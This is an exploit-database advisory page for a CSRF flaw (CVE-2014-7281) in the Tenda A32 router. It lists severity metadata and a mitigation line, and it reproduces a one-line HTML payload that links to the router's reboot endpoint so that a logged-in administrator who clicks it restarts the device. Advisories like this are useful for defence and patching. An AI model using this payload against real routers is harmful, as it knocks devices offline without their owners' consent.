header-logo
Suggest Exploit
vendor:
A32 Router
by:
zixian
7,8
CVSS
HIGH
CSRF
352
CWE
Product Name: A32 Router
Affected Version From: V5.07.53_CN
Affected Version To: V5.07.53_CN
Patch Exists: NO
Related CWE: CVE-2014-7281
CPE: h:tenda:a32
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2014

Tenda A32 Router CSRF Vulnerability(reboot the Router)

When the administrator login, clicking on the link provided will cause the device to reboot.

Mitigation:

Ensure that all user input is validated and sanitized before being used in any system operations.
Source

Exploit-DB raw data:

# Exploit Title: Tenda A32 Router CSRF Vulnerability(reboot the Router)
# CVE ID :CVE-2014-7281
# Date: 2014-10-10
# Exploit Author: zixian
# Vendor Homepage: http://tenda.com.cn/
# Software Link: http://tenda.com.cn/Catalog/Product/325
# Version: V5.07.53_CN



When the administrator login, click on the link below, the device will reboot。


<a href="http://192.168.2.1/goform/SysToolReboot">reboot</a>

Navigation

Suggest Exploit

Services By CQR